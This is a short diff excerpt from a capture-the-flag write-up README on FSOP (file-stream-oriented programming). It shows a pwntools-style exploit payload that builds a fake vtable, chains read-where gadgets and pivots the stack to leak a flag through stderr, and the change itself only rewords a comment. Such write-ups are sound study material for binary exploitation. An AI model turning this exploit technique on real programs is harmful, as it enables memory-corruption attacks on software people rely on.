Mymaqn/roadtopwn/challenge_writeups/FSOP/README.md

 padding = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH"

-#Stage 1 Create fake vtable, write flag to stderr, change low byte of stderr to point to write_base, stack pivot to the section with the file descriptor pointers
+#Stage 1 Create fake vtable, write flag to stderr, change low byte of stderr to point to write_base, stack pivot to the section with the open file pointers
 io.send(padding + p64(abovestdout-0x8) + read_where(abovestdout-0x8) + read_where(abovestdin) + read_where(abovestderr) + read_where(fakevtable) + read_where(fullcontrol) + leave)

 sleep(0.1)